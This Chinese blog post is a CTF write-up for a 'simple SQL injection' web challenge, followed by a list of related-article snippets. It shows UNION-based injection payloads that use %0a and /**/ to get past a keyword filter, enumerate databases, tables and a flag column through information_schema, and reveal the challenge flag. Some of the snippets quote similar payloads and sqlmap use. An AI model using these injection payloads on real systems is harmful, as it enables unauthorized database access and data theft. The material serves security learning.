[CTF]简单的sql注入之1

最新推荐文章于 2025-10-13 14:24:03 发布
原创 最新推荐文章于 2025-10-13 14:24:03 发布 · 1.2k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一次SQL注入攻击的实际操作过程,包括如何绕过过滤、爆破数据库名、表名及字段名,最终获取到FLAG信息。展示了在特定环境下利用SQL注入漏洞进行信息泄露的方法。

类型:web
网址:http://www.shiyanbar.com/ctf/1875
攻击:sql注入
一句话总结:
id有回显的sql注入(手工)

Writeup:

Union、select等被过滤,使用union%0a、select%0a代替
或者%0a用/**/替代也可以。

爆数据库名称:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

结果:baloteli、information_schema、test、web1

爆表:

1' union%0a select%0a table_name from%0a information_schema.tables%0a where%0a '1'='1

结果有很多,找到最后几张表,发现flag表

爆flag表flag字段的数据:

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

结果两条数据,分别是baloteli、flag{Y0u_@r3_5O_dAmn_90Od}

FLAG

flag{Y0u_@r3_5O_dAmn_90Od}

sql注入--1初识sql注入
技术骨干小李的博客
07-13 722
sql注入的迅速了解
CTF Web简单SQL注入
RED_散的博客
09-17 1001
题目链接
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
最新SQL 三种注入方式详解,零基础入门到精通,收藏这一篇就够了
最新发布
分享Python知识
10-13 524
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。因此,网络安全领域的薪资近年来也呈现稳步增长的态势。
SQL注入-1
ahu0076的博客
04-18 164
select * from table_name where id=1 select version() 显示数据库的版本信息 select * from table_name where id=1 order by 1; 猜表的列数 order by 后面从1开始依次猜解 union前后语句的列数必须相同 select * from table_name where id ...
SQL注入详解-1
weixin_33859844的博客
11-09 131
< DOCTYPE html PUBLIC -WCDTD XHTML StrictEN httpwwwworgTRxhtmlDTDxhtml-strictdtd> 随着B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性...
CTF-SQL注入
m0_66921984的博客
04-14 1030
输入 1' union select version(),group_concat(column_name) from information_schema.columns where table_schema='dvwa'and table_name='users'#这里我们用了一个函数,group_concat(),这个函数你们可以在网卡搜一下,就是把查到的列放在一个数组里面,大白话,就是都放一块,好看一些。id=1 and 1=1 or id=1 and 1=2 如果都没报错,那么就是字符类型。
CTF常用sql注入(一)联合注入和宽字节
2301_81040377的博客
07-04 751
给自己总结一下sql注入的常用姿势吧,记录一下学习。
ctf-sql注入学习笔记
wwwyyyxxxx的博客
03-04 403
盲注:根据不同的输入得到的不同响应判断语句的正确性,进一步解flag,一般使用脚本或者sqlmap更方便,盲注又分为时间盲注和布尔盲注。sql注入原理:用户的输入未经检验或者成功逃逸,与sql语句拼接造成非法操作。时间盲注:根据页面的响应时间判断语句的真假一般使用if和sleep搭配使用。报错注入:利用特定函数的报错特性,使结果跟随报错一同输出。联合查询:使用union拼接其他语句查询。暂时写到这,有时间再写。
CTF-Web学习笔记:SQL注入
Deng7326的博客
07-28 1371
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重点分享了实战经验:如何判断注入点、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
CTFSQL注入常见题型整理.pdf
05-13
在网络安全竞赛CTF(Capture The Flag)中,SQL注入是一种常见的攻击技术,它通过在应用程序中注入恶意的SQL代码来利用后端数据库。本文整理了CTFSQL注入的常见题型,便于参与者练习和掌握不同情况下的注入技巧。 ...
简单sql注入1
qq_36915061的博客
12-19 856
通过sql注入得到flag 题目:http://ctf5.shiyanbar.com/423/web 打开题目: 先随便输了些数字,发现只有1、2、3查询结果 接下来进行第一步测试 输入一个带单引号的数据,目的是测试是否存在注入点,输入1’发现报错,说明此处存在注入点。且后台代码应该是一般的seletc语句,可以通过开闭合单引号来进行注入。 输入1 and 1=1发现id后显示1 1=1说明存在...
CTF-Web学习笔记——简单SQL注入(一)
weixin_55914379的博客
01-07 1144
SQL注入简单手注
CTF刷题总结(1)------简单SQL注入
qq_45047250的博客
04-25 1574
第一次写分享类的文章,有错误的地方还请大家多多指正哈!此篇文章主要分享一些刷web题目中会遇到的一些知识点,之后还会继续分享一些关于这方面的知识。 文章目录简单sql注入预备知识注入前判断如何判断注入顺序及操作总结 简单sql注入 预备知识 schema:可以代表数据库的组织和结构,其中schema和schemata的模式可以是表、列、数据类型、关系、主键等等。下面会通过例子来说明,大家可以自行体会。 information_schema: 是MySQL自带的信息数据库,用于存储数据库元数据(例如:数
简单sql注入实战
mukami0621的博客
12-09 839
sqlmap相关 ​写在前面:对于某网http://www.xxxx.com/xxxxx.asp?id=11,我采取了sqlmap和啊D两个工具一起来进行sql注入。当然是只作为学习sqlmap和总结语句用,仅供参考,我们要富强、民主、文明、和谐,自由、平等、公正、法治,爱国、敬业、诚信、友善 啊D Sqlmap: 检查注入点是否存在: sqlmap.py -
SQL注入1----(sql注入原理)
一起进步
08-23 791
摘要:本文介绍了SQL注入的基本原理,通过pikachu测试网站演示注入过程。SQL注入是因为未对用户输入参数进行严格过滤,导致恶意SQL语句被服务器执行。文章阐述了查找注入点的方法(所有与数据库交互的前端输入点)、浏览器直接注入和Burp测试技巧,并详细说明了常用注释符号(#、--)的使用场景及注意事项。最后预告了后续将讲解SQL注入分类,为读者提供基础安全知识。全文约150字。
学习笔记-SQL注入-1
weixin_52501704的博客
09-15 342
关于学习笔记-SQL注入-1
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 6247
ctfshow 靶场 web入门 sql注入系列
SQL注入详解(一)-原理篇
ppxwfw的博客
09-20 357
想象一下,你正在一家银行的ATM机前准备取钱。正常情况下,你需要插入银行卡,输入正确的密码,然后选择取款金额。但如果这台ATM机存在设计缺陷,允许你在输入密码时添加一些特殊指令,比如"给我显示所有账户信息"或者"把隔壁账户的钱也转给我",那会发生什么?SQL注入就是这样一种攻击方式。当网站或应用程序在处理用户输入时没有进行充分的验证和过滤,攻击者就可以通过精心构造的输入内容,让数据库执行非预期的SQL语句,从而获取敏感信息、修改数据,甚至完全控制数据库。今天我们就来深入了解SQL注入的原理,并通过四种主流编
CTF竞赛SQL注入题型详解:从基础到高级攻击技巧
资源摘要信息:"网络安全CTF竞赛中SQL注入题型解析:常见攻击手法与绕过技巧总结" SQL注入攻击是一种常见的网络攻击手段,主要应用于Web应用程序,攻击者通过在应用程序输入字段中注入恶意SQL代码,以操作后端数据库...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值